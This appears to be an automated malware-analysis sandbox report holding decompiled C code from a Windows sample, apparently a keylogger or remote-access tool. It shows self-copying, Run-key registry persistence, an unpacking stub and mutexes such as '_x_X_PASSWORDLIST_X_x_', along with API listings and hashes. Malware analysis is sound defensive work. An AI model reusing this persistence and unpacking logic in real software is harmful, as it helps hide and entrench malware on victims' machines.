						__eflags =  *_t108 - 2;
						if(__eflags != 0) {
							_t109 =  *0x40d1f0; // 0x40e890
							__eflags =  *_t109 - 3;
							if(__eflags != 0) {
								_t110 =  *0x40d218; // 0x40e894
								_t112 = E00401D50( *_t110);
								_t332 =  *0x40d218; // 0x40e894
								_t333 =  *_t332;
								__eflags =  *((char*)(_t333 + _t112 - 1)) - 0x5c;
								if( *((char*)(_t333 + _t112 - 1)) != 0x5c) {
									_t301 =  *0x40d218; // 0x40e894
									E00401D58(_t301, 0x407078);
								}
								_t334 =  *0x40d218; // 0x40e894
								E00401B58( &_v12,  *_t334);
								E00401CAC( &_v28, E00401F48(_v12));
								E00406684(_v28, _t313, __eflags);
							} else {
								E004061DC( &_v12, _t313, __esi, __eflags);
							}
						} else {
							E00406034( &_v12, _t313, __eflags);
						}
					} else {
						E00405F7C( &_v12, _t313, __eflags);
					}
				} else {
					E00405EF0( &_v12, _t313, _t399);
				}
				if( *((char*)(_v12 + E00401D50(_v12) - 1)) != 0x5c) {
					E00401D58( &_v12, 0x407078);
				}
				_t338 =  *0x40d208; // 0x40e898
				E00401D58( &_v12,  *_t338);
				_t126 = E00401D50(_v12);
				_t340 = _v12;
				_t401 =  *((char*)(_t340 + _t126 - 1)) - 0x5c;
				if( *((char*)(_t340 + _t126 - 1)) != 0x5c) {
					E00401D58( &_v12, 0x407078);
				}
				_t315 =  *0x40d20c; // 0x40e89c
				E00401D9C( &_v16,  *_t315, _v12);
				E00401CAC( &_v32, E00401F48(_v12));
				E00406684(_v32, _t313, _t401); // executed
				E00401CAC( &_v36, E00401F48(_v16));
				E00405A28(_v36, _t313, _t391, _t393, _t401); // executed
				E00405BEC( &_v40, _t313, _t393, _t401); // executed
				_push(_v40);
				_push(0x407078);
				_t143 =  *0x40d208; // 0x40e898
				_push( *_t143);
				E00401E10();
				_t402 =  *((char*)(_v20 + E00401D50(_v20) - 1)) - 0x5c;
				if(_t402 != 0) {
					E00401D58( &_v20, 0x407078);
				}
				_t317 =  *0x40d20c; // 0x40e89c
				E00401D9C( &_v24,  *_t317, _v20);
				E00404740(_v16, _t313,  &_v44, _t391, _t393, _t402);
				_push(_v44);
				E00404740(_v8, _t313,  &_v48, _t391, _t393, _t402);
				_pop(_t154);
				E00401E94(_t154, _v48);
				if(_t402 == 0) {
					L21:
					E00401B14(_t313, _v8);
					goto L40;
				} else {
					E00404740(_v24, _t313,  &_v52, _t391, _t393, _t402);
					_push(_v52);
					E00404740(_v8, _t313,  &_v56, _t391, _t393, _t402);
					_pop(_t166);
					E00401E94(_t166, _v56);
					if(_t402 != 0) {
						_t169 = E00401F48(_v16);
						_t394 = E00401F48(_v8);
						_t172 = CopyFileA(_t394, _t169, 0);
						__eflags = _t172 - 1;
						asm("sbb eax, eax");
						__eflags = _t172 + 1 - 1;
						if(_t172 + 1 != 1) {
							E00401CAC( &_v60, E00401F48(_v20));
							E00406684(_v60, _t313, __eflags);
							_t392 = E00401F48(_v24);
							E00401CAC( &_v64, _t392);
							E00405A28(_v64, _t313, _t392, _t394, __eflags);
							_t186 = CopyFileA(_t394, _t392, 0);
							__eflags = _t186 - 1;
							asm("sbb eax, eax");
							__eflags = _t186 + 1 - 1;
							if(_t186 + 1 != 1) {
								E00401B14(_t313, _v8);
							} else {
								E00401B14(_t313, _v24);
							}
						} else {
							E00401B14(_t313, _v16);
						}
						_t190 =  *0x40d1ec; // 0x40e8ac
						__eflags =  *_t190;
						if( *_t190 != 0) {
							_t248 =  *0x40d1ec; // 0x40e8ac
							E00401CAC( &_v72, E00401F48( *_t248));
							E00406088(0x80000002, _t313, _v72, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v68, 0);
							E00401E94(_v68,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v76, E00401F48( *_t313));
								_t284 =  *0x40d1ec; // 0x40e8ac
								E00401CAC( &_v80, E00401F48( *_t284));
								E00405C4C(0x80000002, _t313, _v80, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v76);
							}
							_t258 =  *0x40d1ec; // 0x40e8ac
							E00401CAC( &_v88, E00401F48( *_t258));
							E00406088(0x80000001, _t313, _v88, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v84, 0);
							E00401E94(_v84,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v92, E00401F48( *_t313));
								_t272 =  *0x40d1ec; // 0x40e8ac
								E00401CAC( &_v96, E00401F48( *_t272));
								E00405C4C(0x80000001, _t313, _v96, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v92);
							}
						}
						_t191 =  *0x40d1d8; // 0x40e8a4
						__eflags =  *_t191;
						if( *_t191 != 0) {
							_t226 =  *0x40d1d8; // 0x40e8a4
							E00401CAC( &_v104, E00401F48( *_t226));
							E00406088(0x80000002, _t313, _v104, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v100, 0);
							E00401E94(_v100,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v108, E00401F48( *_t313));
								_t240 =  *0x40d1d8; // 0x40e8a4
								E00401CAC( &_v112, E00401F48( *_t240));
								E00405C4C(0x80000002, _t313, _v112, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v108);
							}
						}
						_t192 =  *0x40d1e0; // 0x40e8a8
						__eflags =  *_t192;
						if( *_t192 != 0) {
							_t204 =  *0x40d1e0; // 0x40e8a8
							E00401CAC( &_v120, E00401F48( *_t204));
							E00406088(0x80000001, _t313, _v120, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v116, 0);
							E00401E94(_v116,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v124, E00401F48( *_t313));
								_t218 =  *0x40d1e0; // 0x40e8a8
								E00401CAC( &_v128, E00401F48( *_t218));
								E00405C4C(0x80000001, _t313, _v128, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v124);
							}
						}
						_t193 =  *0x40d1e4; // 0x40e8a0
						__eflags =  *_t193;
						if( *_t193 != 0) {
							_push(0x4070fc);
							_push(E00406840(1));
							_push(E00401F48( *_t313));
							_t198 =  *0x40d1e4; // 0x40e8a0
							_t200 = E00401F48( *_t198);
							_pop(_t321);
							_pop(_t201);
							E00406ADC(_t201, _t321, _t200, __eflags);
						}
						L40:
						_pop(_t351);
						 *[fs:eax] = _t351;
						_push(E00407068);
						return E00401AE4( &_v128, 0x1f);
					}
					goto L21;
				}
			}















































































                                    0x00406b54
                                    0x00406b54
                                    0x00406b55
                                    0x00406b57
                                    0x00406b5c
                                    0x00406b5c
                                    0x00406b5e
                                    0x00406b60
                                    0x00406b60
                                    0x00406b63
                                    0x00406b65
                                    0x00406b66
                                    0x00406b67
                                    0x00406b69
                                    0x00406b6f
                                    0x00406b76
                                    0x00406b77
                                    0x00406b7c
                                    0x00406b7f
                                    0x00406b87
                                    0x00406b8c
                                    0x00406b91
                                    0x00406b94
                                    0x00406ba3
                                    0x00406ba8
                                    0x00406bab
                                    0x00406bba
                                    0x00406bbf
                                    0x00406bc2
                                    0x00406bce
                                    0x00406bd3
                                    0x00406bd6
                                    0x00406be2
                                    0x00406be9
                                    0x00406bee
                                    0x00406bf4
                                    0x00406bf6
                                    0x00406bfb
                                    0x00406bfd
                                    0x00406c07
                                    0x00406c0c
                                    0x00406c14
                                    0x00406c1c
                                    0x00406c2e
                                    0x00406c36
                                    0x00406bd8
                                    0x00406bdb
                                    0x00406bdb
                                    0x00406bc4
                                    0x00406bc7
                                    0x00406bc7
                                    0x00406bad
                                    0x00406bb0
                                    0x00406bb0
                                    0x00406b96
                                    0x00406b99
                                    0x00406b99
                                    0x00406c4b
                                    0x00406c55
                                    0x00406c55
                                    0x00406c5d
                                    0x00406c65
                                    0x00406c6d
                                    0x00406c72
                                    0x00406c75
                                    0x00406c7a
                                    0x00406c84
                                    0x00406c84
                                    0x00406c89
                                    0x00406c97
                                    0x00406ca9
                                    0x00406cb1
                                    0x00406cc3
                                    0x00406ccb
                                    0x00406cd3
                                    0x00406cd8
                                    0x00406cdb
                                    0x00406ce0
                                    0x00406ce5
                                    0x00406cef
                                    0x00406cff
                                    0x00406d04
                                    0x00406d0e
                                    0x00406d0e
                                    0x00406d13
                                    0x00406d21
                                    0x00406d2c
                                    0x00406d34
                                    0x00406d3b
                                    0x00406d43
                                    0x00406d44
                                    0x00406d49
                                    0x00406d70
                                    0x00406d75
                                    0x00000000
                                    0x00406d4b
                                    0x00406d51
                                    0x00406d59
                                    0x00406d60
                                    0x00406d68
                                    0x00406d69
                                    0x00406d6e
                                    0x00406d84
                                    0x00406d92
                                    0x00406d95
                                    0x00406d9a
                                    0x00406d9d
                                    0x00406da0
                                    0x00406da2
                                    0x00406dbd
                                    0x00406dc5
                                    0x00406dd2
                                    0x00406dd9
                                    0x00406de1
                                    0x00406dea
                                    0x00406def
                                    0x00406df2
                                    0x00406df5
                                    0x00406df7
                                    0x00406e0a
                                    0x00406df9
                                    0x00406dfe
                                    0x00406dfe
                                    0x00406da4
                                    0x00406da9
                                    0x00406da9
                                    0x00406e0f
                                    0x00406e14
                                    0x00406e17
                                    0x00406e23
                                    0x00406e34
                                    0x00406e46
                                    0x00406e50
                                    0x00406e55
                                    0x00406e63
                                    0x00406e6c
                                    0x00406e7d
                                    0x00406e8f
                                    0x00406e8f
                                    0x00406e9a
                                    0x00406eab
                                    0x00406ebd
                                    0x00406ec7
                                    0x00406ecc
                                    0x00406eda
                                    0x00406ee3
                                    0x00406ef4
                                    0x00406f06
                                    0x00406f06
                                    0x00406ecc
                                    0x00406f0b
                                    0x00406f10
                                    0x00406f13
                                    0x00406f1b
                                    0x00406f2c
                                    0x00406f3e
                                    0x00406f48
                                    0x00406f4d
                                    0x00406f5b
                                    0x00406f64
                                    0x00406f75
                                    0x00406f87
                                    0x00406f87
                                    0x00406f4d
                                    0x00406f8c
                                    0x00406f91
                                    0x00406f94
                                    0x00406f9c
                                    0x00406fad
                                    0x00406fbf
                                    0x00406fc9
                                    0x00406fce
                                    0x00406fdc
                                    0x00406fe5
                                    0x00406ff6
                                    0x00407008
                                    0x00407008
                                    0x00406fce
                                    0x0040700d
                                    0x00407012
                                    0x00407015
                                    0x00407017
                                    0x00407028
                                    0x00407030
                                    0x00407031
                                    0x00407038
                                    0x0040703f
                                    0x00407040
                                    0x00407041
                                    0x00407041
                                    0x00407046
                                    0x00407048
                                    0x0040704b
                                    0x0040704e
                                    0x00407060
                                    0x00407060
                                    0x00000000
                                    0x00406d6e

                                    APIs
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406D95
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406DEA
                                      • Part of subcall function 00406088: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                      • Part of subcall function 00406088: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                      • Part of subcall function 00405C4C: RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 00405C92
                                      • Part of subcall function 00405C4C: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CBA
                                      • Part of subcall function 00405C4C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Value$CloseCopyFileQuery$CreateOpen
                                    • String ID: 4h@$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$Software\Microsoft\Windows\CurrentVersion\Run
                                    • API String ID: 1469814539-1189044031
                                    • Opcode ID: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction ID: 0337d0d0e41828abccd6a10b42b8af73d9b7eafca3f8209fdc2fdaca8a3f3fd1
                                    • Opcode Fuzzy Hash: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction Fuzzy Hash: 13E1FC34A041099FDB11EBA9C881A9EB3B5AF45308F60417BF405BB2F6DB38AD45CB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004019D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 31%
                                    			E004019D8() {
				struct HINSTANCE__* _t24;
				intOrPtr _t32;
				void* _t42;

				if( *0x0040E5BC != 0 ||  *0x40e024 == 0) {
					L3:
					if( *0x40d004 != 0) {
						 *0x40d068();
					}
					L5:
					while(1) {
						if( *((char*)(0x40e5bc)) == 2 &&  *0x40d000 == 0) {
							 *0x0040E5A0 = 0;
						}
						 *0x40d030();
						if( *((char*)(0x40e5bc)) <= 1 ||  *0x40d000 != 0) {
							if( *0x0040E5A4 != 0) {
								 *0x40d01c();
								_t32 =  *((intOrPtr*)(0x40e5a4));
								_t7 = _t32 + 0x10; // 0x0
								_t24 =  *_t7;
								_t8 = _t32 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						 *0x40d034();
						if( *((char*)(0x40e5bc)) == 1) {
							 *0x0040E5B8();
						}
						if( *((char*)(0x40e5bc)) != 0) {
							E004019A8();
						}
						if( *0x40e594 == 0) {
							if( *0x40e014 != 0) {
								 *0x40e014();
							}
							ExitProcess( *0x40d000); // executed
						}
						memcpy(0x40e594,  *0x40e594, 0xb << 2);
						_t42 = _t42 + 0xc;
						0x40d000 = 0x40d000;
					}
				} else {
					do {
						 *0x40e024 = 0;
						 *((intOrPtr*)( *0x40e024))();
					} while ( *0x40e024 != 0);
					goto L3;
				}
			}






                                    0x004019ef
                                    0x00401a07
                                    0x00401a0e
                                    0x00401a10
                                    0x00401a10
                                    0x00000000
                                    0x00401a16
                                    0x00401a1a
                                    0x00401a23
                                    0x00401a23
                                    0x00401a26
                                    0x00401a30
                                    0x00401a3c
                                    0x00401a3e
                                    0x00401a44
                                    0x00401a47
                                    0x00401a47
                                    0x00401a4a
                                    0x00401a4d
                                    0x00401a54
                                    0x00401a54
                                    0x00401a4d
                                    0x00401a3c
                                    0x00401a59
                                    0x00401a63
                                    0x00401a65
                                    0x00401a65
                                    0x00401a6c
                                    0x00401a6e
                                    0x00401a6e
                                    0x00401a76
                                    0x00401a7f
                                    0x00401a81
                                    0x00401a81
                                    0x00401a8a
                                    0x00401a8a
                                    0x00401a9b
                                    0x00401a9b
                                    0x00401a9d
                                    0x00401a9d
                                    0x004019f6
                                    0x004019f6
                                    0x004019fc
                                    0x00401a00
                                    0x00401a02
                                    0x00000000
                                    0x004019f6

                                    APIs
                                    • FreeLibrary.KERNEL32(00400000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A54
                                    • ExitProcess.KERNEL32(00000000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A8A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExitFreeLibraryProcess
                                    • String ID: @&@$@&@$D0@
                                    • API String ID: 1404682716-1618351410
                                    • Opcode ID: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction ID: 5263b8d098c20f51001af61e3d55436e18b8afc55997b24df4f1e0aa037ee43b
                                    • Opcode Fuzzy Hash: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction Fuzzy Hash: 4521AF70A022418FEB209FA5C9887537BE5AF44318F284476D848AA2E2C77CCCC5CF5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405EAC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405EAC(long __eax, CHAR* __edx) {
				long _t4;
				long _t5;
				CHAR* _t7;

				_t7 = __edx;
				_t5 = __eax;
				GetProcAddress(LoadLibraryA("kernel32.dll"), "GetTempPathA");
				_t4 = GetTempPathA(_t5, _t7); // executed
				return _t4;
			}






                                    0x00405eae
                                    0x00405eb0
                                    0x00405ec2
                                    0x00405ec9
                                    0x00405ecd

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA,?,?,0040601D,?,00409E30,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00405EBC
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405EC2
                                    • GetTempPathA.KERNELBASE(00000105,?,00000000,kernel32.dll,GetTempPathA,?,?,0040601D,?,00409E30,00000000,?), ref: 00405EC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadPathProcTemp
                                    • String ID: GetTempPathA$kernel32.dll
                                    • API String ID: 1686214323-3269217876
                                    • Opcode ID: ae85f7ca30a4ebc3f898838e590f98755c29af6d739c50bb3d1863989f8de6f9
                                    • Instruction ID: ddb0b176c331170ea1d21e324cbd039c108f0085b782601a862f0faf436c2439
                                    • Opcode Fuzzy Hash: ae85f7ca30a4ebc3f898838e590f98755c29af6d739c50bb3d1863989f8de6f9
                                    • Instruction Fuzzy Hash: CCC08CB121162035E5207AF60C8AE97084CCC842A632408337004F22C294BE1E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00455C10, Relevance: 7.7, APIs: 5, Instructions: 179librarymemoryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 83%
                                    			_entry_(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v128;
				void* _t64;
				void* _t65;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				signed int _t70;
				signed int _t71;
				unsigned int _t72;
				char _t82;
				signed char* _t84;
				long _t85;
				char* _t88;
				void* _t92;
				long _t93;
				void* _t95;
				void* _t98;
				intOrPtr* _t108;
				void* _t111;
				long _t112;
				char* _t123;
				intOrPtr* _t136;
				long _t140;
				intOrPtr* _t143;
				long _t147;
				intOrPtr* _t150;
				long _t154;
				struct HINSTANCE__* _t157;
				struct HINSTANCE__* _t160;
				signed int _t163;
				signed int _t255;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				void* _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				char* _t271;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t278;
				void* _t279;
				void* _t280;
				void* _t281;
				void* _t282;
				void* _t283;
				intOrPtr* _t285;
				intOrPtr _t291;
				signed int _t316;
				unsigned int* _t317;
				CHAR* _t319;
				void* _t320;
				char* _t321;
				signed int _t322;
				unsigned int* _t323;
				signed int _t324;
				struct HINSTANCE__* _t325;
				unsigned int _t326;
				intOrPtr _t327;
				DWORD* _t328;
				intOrPtr _t329;
				void* _t330;
				signed int _t332;
				void* _t335;

				_t335 = __fp0;
				_t330 = __eflags;
				asm("pushad");
				_t322 = 0x412000;
				_t1 = _t322 - 0x11000; // 0x401000
				_t316 = _t1;
				_push(_t316);
				_t325 = _t324 | 0xffffffff;
				while(1) {
					_t259 =  *_t322;
					_t322 = _t322 - 0xfffffffc;
					asm("adc ebx, ebx");
					do {
						if(_t330 < 0) {
							_t64 =  *_t322;
							_t322 = _t322 + 1;
							 *_t316 = _t64;
							_t316 = _t316 + 1;
							__eflags = _t316;
							goto L47;
						}
						_t65 = 1;
						while(1) {
							_t260 = _t259 + _t259;
							if(_t260 == 0) {
								_t260 =  *_t322;
								_t322 = _t322 - 0xfffffffc;
								asm("adc ebx, ebx");
							}
							asm("adc eax, eax");
							_t261 = _t260 + _t260;
							_t332 = _t261;
							if(_t332 >= 0) {
								goto L56;
							}
							L54:
							if(_t332 != 0) {
								L62:
								_t272 = 0;
								_t66 = _t65 - 3;
								__eflags = _t66;
								if(_t66 < 0) {
									_t261 = _t261 + _t261;
									__eflags = _t261;
									if(__eflags == 0) {
										_t261 =  *_t322;
										_t322 = _t322 - 0xfffffffc;
										asm("adc ebx, ebx");
									}
									L67:
									if(__eflags < 0) {
										L59:
										_t259 = _t261 + _t261;
										__eflags = _t259;
										if(_t259 == 0) {
											_t259 =  *_t322;
											_t322 = _t322 - 0xfffffffc;
											asm("adc ebx, ebx");
										}
										asm("adc ecx, ecx");
										L77:
										__eflags = _t325 - 0xfffffb00;
										asm("adc ecx, 0x2");
										_t285 = _t325 + _t316;
										__eflags = _t325 - 0xfffffffc;
										if(_t325 <= 0xfffffffc) {
											do {
												_t67 =  *_t285;
												_t285 = _t285 + 4;
												 *_t316 = _t67;
												_t316 = _t316 + 4;
												_t272 = _t272 - 4;
												__eflags = _t272;
											} while (_t272 > 0);
											_t316 = _t316 + _t272;
											break;
										} else {
											goto L78;
										}
										do {
											L78:
											_t68 =  *_t285;
											_t285 = _t285 + 1;
											 *_t316 = _t68;
											_t316 = _t316 + 1;
											_t272 = _t272 - 1;
											__eflags = _t272;
										} while (_t272 != 0);
										break;
									}
									_t272 = _t272 + 1;
									_t261 = _t261 + _t261;
									__eflags = _t261;
									if(__eflags == 0) {
										_t261 =  *_t322;
										_t322 = _t322 - 0xfffffffc;
										asm("adc ebx, ebx");
									}
									if(__eflags < 0) {
										goto L59;
									} else {
										goto L71;
										do {
											do {
												L71:
												_t262 = _t261 + _t261;
												__eflags = _t262;
												if(_t262 == 0) {
													_t262 =  *_t322;
													_t322 = _t322 - 0xfffffffc;
													asm("adc ebx, ebx");
												}
												asm("adc ecx, ecx");
												_t261 = _t262 + _t262;
												__eflags = _t261;
											} while (__eflags >= 0);
											if(__eflags != 0) {
												break;
											}
											_t261 =  *_t322;
											_t322 = _t322 - 0xfffffffc;
											__eflags = _t322;
											asm("adc ebx, ebx");
										} while (_t322 >= 0);
										_t272 = _t272 + 2;
										__eflags = _t272;
										goto L77;
									}
								}
								_t70 =  *_t322;
								_t322 = _t322 + 1;
								_t71 = _t70 ^ 0xffffffff;
								__eflags = _t71;
								if(__eflags == 0) {
									_pop(_t323);
									_t317 = _t323;
									goto L83;
									do {
										do {
											L83:
											_t72 =  *_t317;
											_t317 =  &(_t317[0]);
											__eflags = _t72 - 0xe8 - 1;
										} while (_t72 - 0xe8 > 1);
										__eflags =  *_t317 - 1;
									} while ( *_t317 != 1);
									asm("rol eax, 0x10");
									 *_t317 = ( *_t317 >> 8) - _t317 + _t323;
									__eflags =  &(_t317[1]);
									asm("loop 0xffffffdb");
									_t50 =  &(_t323[0x13c00]); // 0x450000
									_t319 = _t50;
									while(1) {
										L86:
										_t82 =  *_t319;
										__eflags = _t82;
										if(_t82 == 0) {
											break;
										}
										_t51 =  &(_t319[4]); // 0xf1ec
										_t271 = _t323 +  *_t51;
										_t321 =  &(_t319[8]);
										__eflags = _t321;
										_t325 = LoadLibraryA( &(_t323[0x156c2]) + _t82);
										while(1) {
											_t319 =  &(_t321[1]);
											_t255 =  *_t321;
											__eflags = _t255;
											if(_t255 == 0) {
												goto L86;
											}
											asm("repne scasb");
											_t82 = GetProcAddress(_t325, _t319);
											__eflags = _t82;
											if(_t82 == 0) {
												ExitProcess();
											}
											 *_t271 = _t82;
											_t271 =  &(_t271[4]);
										}
									}
									_t326 = _t323[0x156f6];
									_t59 = _t323 - 0x1000; // 0x400000
									_t320 = _t59;
									VirtualProtect(_t320, 0x1000, 4, _t328);
									_t60 = _t320 + 0x21f; // 0x40021f
									_t84 = _t60;
									 *_t84 =  *_t84 & 0x0000007f;
									_t61 =  &(_t84[0x28]);
									 *_t61 = _t84[0x28] & 0x0000007f;
									__eflags =  *_t61;
									_t85 = _t82;
									_push(_t85);
									VirtualProtect(_t320, 0x1000, _t85, _t328); // executed
									asm("popad");
									_t88 =  &_v128;
									do {
										_push(0);
										__eflags = _t328 - _t88;
									} while (_t328 != _t88);
									_t329 = _t328 - 0xffffff80;
									_push(_t326);
									_t327 = _t329;
									_t274 = 0xb;
									do {
										_push(0);
										_push(0);
										_t274 = _t274 - 1;
										__eflags = _t274;
									} while (_t274 != 0);
									_push(0x1000);
									E00403418(0x40bb04);
									_push(_t327);
									_push(0x40c0c4);
									_push( *[fs:eax]);
									 *[fs:eax] = _t329;
									_t92 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
									_t266 = _t92;
									_t93 = GetLastError();
									__eflags = _t93 - 0xb7;
									if(_t93 != 0xb7) {
										CloseHandle(_t266); // executed
									} else {
										CloseHandle(_t266);
										Sleep(0x2ee0);
									}
									_t95 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
									_t267 = _t95;
									__eflags = GetLastError() - 0xb7;
									if(__eflags != 0) {
										CloseHandle(_t267);
										_t98 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
										_t268 = _t98;
										__eflags = GetLastError() - 0xb7;
										if(__eflags != 0) {
											CloseHandle(_t268);
											L27:
											E004013A4(1,  &_v80);
											_t287 = "Restart";
											E00401E94(_v80, "Restart");
											if(__eflags != 0) {
												Sleep(0x3e8); // executed
											}
											E00404604(_t274, __eflags);
											E0040491C();
											E0040B118(_t287, _t320, _t323);
											_t108 =  *0x40d204; // 0x40e8f8
											_t111 = E00403568(0, 0, E00401F48( *_t108)); // executed
											_t269 = _t111;
											_t112 = GetLastError();
											__eflags = _t112 - 0xb7;
											if(_t112 != 0xb7) {
												CloseHandle(_t269); // executed
											} else {
												CloseHandle(_t269);
												Sleep(0x3e8);
												_t136 =  *0x40d204; // 0x40e8f8
												_t269 = E00403568(0, 0, E00401F48( *_t136));
												_t140 = GetLastError();
												__eflags = _t140 - 0xb7;
												if(_t140 != 0xb7) {
													CloseHandle(_t269);
												} else {
													CloseHandle(_t269);
													Sleep(0x3e8);
													_t143 =  *0x40d204; // 0x40e8f8
													_t269 = E00403568(0, 0, E00401F48( *_t143));
													_t147 = GetLastError();
													__eflags = _t147 - 0xb7;
													if(_t147 != 0xb7) {
														CloseHandle(_t269);
													} else {
														CloseHandle(_t269);
														Sleep(0x3e8);
														_t150 =  *0x40d204; // 0x40e8f8
														_t269 = E00403568(0, 0, E00401F48( *_t150));
														_t154 = GetLastError();
														__eflags = _t154 - 0xb7;
														if(_t154 != 0xb7) {
															CloseHandle(_t269);
														} else {
															ExitProcess(0);
														}
													}
												}
											}
											__eflags =  *((char*)( *0x40d1dc)) - 1;
											if( *((char*)( *0x40d1dc)) != 1) {
												__eflags = 0;
												E004013A4(0, 0x40f1e8);
											} else {
												E004013A4(0,  &_v88);
												E00406B54(_v88, _t269,  &_v84, _t320, _t323); // executed
												E00401B14(0x40f1e8, _v84);
											}
											E00406008( &_v92);
											E00401D58( &_v92, "XX--XX--XX.txt");
											E0040B93C( *0x40f1e8, _t269, _v92, _t320, _t323, __eflags);
											_t123 =  *0x40d214; // 0x40e8f4
											__eflags =  *_t123 - 1;
											if(__eflags == 0) {
												E0040B7FC(_t269, _t320, _t323, __eflags);
												Sleep(0x3e8); // executed
											}
											E0040B3C0(_t269, _t274, _t320, _t323); // executed
											L44:
											__eflags = 0;
											_pop(_t291);
											 *[fs:eax] = _t291;
											_push(0x40c0cb);
											return E00401AE4( &_v92, 0x12);
										}
										CloseHandle(_t268);
										_t157 =  *0x40e670; // 0x400000
